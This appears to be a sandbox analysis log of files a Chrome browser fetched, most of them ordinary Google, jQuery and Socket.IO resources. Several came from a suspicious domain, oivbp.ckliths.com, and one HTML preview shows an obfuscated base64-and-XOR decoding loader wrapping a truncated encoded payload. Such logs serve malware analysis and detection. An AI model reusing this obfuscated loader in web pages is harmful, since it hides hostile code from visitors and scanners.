                                                    SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                    SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2287)
                                                    Category:downloaded
                                                    Size (bytes):171590
                                                    Entropy (8bit):5.559233860613889
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:ECD76486E52F2A2B974F9930460DD1EB
                                                    SHA1:D6D255F6C370E6F53FAF1901B6DC9DD0FCF3AA74
                                                    SHA-256:2DA9A99A2418659D223A7FD16D05F46A311A05CB89D3A3C949C08D1B612FCB7C
                                                    SHA-512:B756EDD0D8D0FB991372E2850D8E65A71CE479FC8804E0FD26EB5A60A1BB50C78278C89BBC1B5915E32D590F057C82F31FB7445C6102FBD3FACD8D6AFB21C2C8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.t7HFqwm59-4.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTv09DM0eg4IoESYVaSRhn20aI9TbQ"
                                                    Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.qj=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var rj,uj,Ej,sj;rj=function(){_.Ia()};uj=function(a,b){(sj||(sj=new WeakMap)).set(a,b);(_.tj||(_.tj=new WeakMap)).set(b,a)};_.vj=function(a,b,c,d){a=_.ub(a,b,c,d);return Array.isArray(a)?a:_.Ac};_.wj=function(a,b){a=(2&b?a|2:a&-3)|32;return a&=-2049};_.xj=function(a,b){a===0&&(a=_.wj(a,b));return a|1};_.yj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.zj=function(a,b,c){32&b&&c||(a&=-33);return a};._.Cj=function(a,b,c,d,e,f,g){var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.vj(a,b,d);var k=h[_.v]|0,l=!!(4&k);if(!l){k=_.xj(k,b);var m=h,p=b;const q=!!(2&k);q&&(p|=2);let x=!q,A=!0,D=0,K=0;for(;D<m.length;D++){const I=_.Ta(m[D],c,p);if(I instanceof c){if(!q){const ja=_.xa(I.ha);x&&(x=!ja);A&&(A=ja)}m[K++]=I}}K<D&&(m.length=K);k|=4;k=A?k|16:k&-17;k=x?k|8:k&-9;m[_.v]=k;q&&Object.freeze(m)}if(g&&!(8&k||!h.length&&(e===1||e===4&&32&k))){_.yj(k)&&(h=_.wa
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):29
                                                    Entropy (8bit):3.9353986674667634
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6FED308183D5DFC421602548615204AF
                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.google.com/async/newtab_promos
                                                    Preview:)]}'.{"update":{"promos":{}}}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65447)
                                                    Category:downloaded
                                                    Size (bytes):89501
                                                    Entropy (8bit):5.289893677458563
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (45034)
                                                    Category:dropped
                                                    Size (bytes):45035
                                                    Entropy (8bit):5.400557193761079
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                    SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                    SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                    SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):270
                                                    Entropy (8bit):4.840496990713235
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:40EB39126300B56BF66C20EE75B54093
                                                    SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                    SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                    SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):70712
                                                    Entropy (8bit):6.94130504124589
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F70FF06D19498D80B130EC78176FD3FF
                                                    SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                    SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                    SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/stiQyxBpklfVmUc1blhlxNi6p3dV6wrsyoik68a45L0Uxi75qdz9FvXcTZ7bOJ7rIAZ0iXef260
                                                    Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):1864
                                                    Entropy (8bit):5.222032823730197
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/klGcg0GmGncwQx1YZHtIDoIfgFxhNmQ4yMOkldP6q2RdVs0cR9rsfNDQaWHrS1Xpfmwx220
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):727
                                                    Entropy (8bit):7.573165690842521
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                    SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                    SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                    SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):141532
                                                    Entropy (8bit):5.767638587066893
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2FA07EB6293534B81C42C12EFE7D1A4C
                                                    SHA1:9B3111E5B3DC45DCF59E87AC0422CBDC1463DCAB
                                                    SHA-256:3A8C7DA73D797E4359284A4F3075E493B3ECB90149335B3F22C83B3086AF72E7
                                                    SHA-512:DC2AEE47FD53C759EF5A3187EDCC842951939D31502E0FB6811CBE1FFA2237871A2533DAF8CCFC3C82A53F744C20B22C7B20372808AA168F483A7C65876887C3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/9237153646160215950352043247426ufy3fk2kok53p6hlf583z4z7qrnbalvmd?81461067793942263957445635738236qwd2lu88b0vqboafgszpzrt5y2viysoip
                                                    Preview:<script>..function WhGyJJviSp(EnGreyBTAr, lfFPmKnEjv) {..let EwRQeKehcu = '';..EnGreyBTAr = atob(EnGreyBTAr);..let hzFaUcszBv = lfFPmKnEjv.length;..for (let i = 0; i < EnGreyBTAr.length; i++) {.. EwRQeKehcu += String.fromCharCode(EnGreyBTAr.charCodeAt(i) ^ lfFPmKnEjv.charCodeAt(i % hzFaUcszBv));..}..return EwRQeKehcu;..}..var KsUyvfBeHS = WhGyJJviSp(`eBMxOjFnCh8BeCxGGBlMPllzLCwpXlUZE100cmY9KhBLeHgPOyolPHo/f1VSE3NzNzs2WwUBUkAhLHl6LEYBBQEJfGAnNyBXWx8DRjY9PXYnXRhaGEImKjYhaQFbQ1wDfSItNmpYBldMD3w8JyotQgFLfzlzb2R4eEEWBxtDJ283KicPVx0GRyM8fndrUREbXEA8LC89MBwcGl0HfXlqaGtBGhYZVidhLTdqXxwbXFkgbXpka0EWBxtDJ3FJUmQSVVVOQDA9LSgwEgYHEQ5xJzAsNEFPWl1UOjssLSYcFhofHDUqKixrQBQbFlYrP2oyNx0HEB5WMjwhK2tWGgIcXzwuIHcyAltBXAB8PSU2IFcNBVxeOiFqMjcQS0ldQDA9LSgwDHh/UhNzb3grJ0AcBQYTID0nZWZaAQECQGlgazsgXB8GXFA/IDE8Il4UBxcdMCApdyVYFA1dXzotN3cnQAwFBlx+JTd3cBxEW0McMD09KDBdWB8BHT4mKnYuQVdLThwgLDYxNEZLeHgTc29kZDdRBxwCR3M8Njt5EB0BBkMgdWt3M0UCWxVcPCgoPWpRGhhdQTYsJSgwUR0UXVIjJmoyNxBLSV1AMD0tKDAMeH9SE3NveDQtXB5VAFY/cmYrMEsZ
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):43596
                                                    Entropy (8bit):7.9952701440723475
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                    SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                    SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                    SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/904lOojVxq3XsO7yqFewlcEbcdqyMBKEyz79
                                                    Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):5162
                                                    Entropy (8bit):5.347368272924798
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4730593243135D6B031CC9B22DD81A65
                                                    SHA1:D76A23DEA3B63396BC8E6B6DCE4804BAB49DC143
                                                    SHA-256:926D84437727A80C3E9389992FF62B14C757B3836968FEFC64E4ED35E7414CB0
                                                    SHA-512:C06480310DAC4B4EF187671FF5E0122337AAB9AE1E2391FB1BA772D2AE2D5A57432D00D8A28E05FB80616AEB5DF05819419222C5EE285F75F5DC8137E93E9A01
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.oS1xTAEm0Kw.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTut2uOtBM_spQkQSjXDMoIyrj9aPA"
                                                    Preview:.gb_N{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ia{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ja{fill:#f9ab00}.gb_F .gb_Ja{fill:#fdd663}.gb_Ka>.gb_Ja{fill:#d93025}.gb_F .gb_Ka>.gb_Ja{fill:#f28b82}.gb_Ka>.gb_La{fill:white}.gb_La,.gb_F .gb_Ka>.gb_La{fill:#202124}.gb_Ma{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):231
                                                    Entropy (8bit):6.725074433303473
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:547988BAC5584B4608466D761E16F370
                                                    SHA1:C11BB71049702528402A31027F200184910A7E23
                                                    SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                    SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65531)
                                                    Category:downloaded
                                                    Size (bytes):135286
                                                    Entropy (8bit):5.437572373333125
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:029D46FA866DB8930E7E263493D543C8
                                                    SHA1:EB0D5656D3714B355CC4D9D9F3B7BBC885226777
                                                    SHA-256:E4E8BB61A26D483B68E286C0A3A552CC7C7169E1D49689100FC6879251DD20AF
                                                    SHA-512:829898D08644BEE811E1F7D89FBCDCE8BC883D52B3B3467705D1700C9B7F67196FE2561A2E09258D969D54EA7D8A839B088BA21045DD2A779E6FA17B7EB00504
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Da gb_0d gb_Oe gb_od\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Nd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_id gb_md gb_Dd gb_jd\"\u003e\u003cdiv class\u003d\"gb_ud gb_pd\"\u003e\u003cdiv class\u003d\"gb_Ic gb_O\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Ic gb_Lc gb_O\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (45667)
                                                    Category:dropped
                                                    Size (bytes):45806
                                                    Entropy (8bit):5.207605835316031
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                    SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                    SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                    SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):93276
                                                    Entropy (8bit):7.997636438159837
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                    SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                    SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                    SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/cdjOAbjvcJOVMlx78ydjrxDdfNnSkl100
                                                    Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1434), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):1434
                                                    Entropy (8bit):5.761950198369007
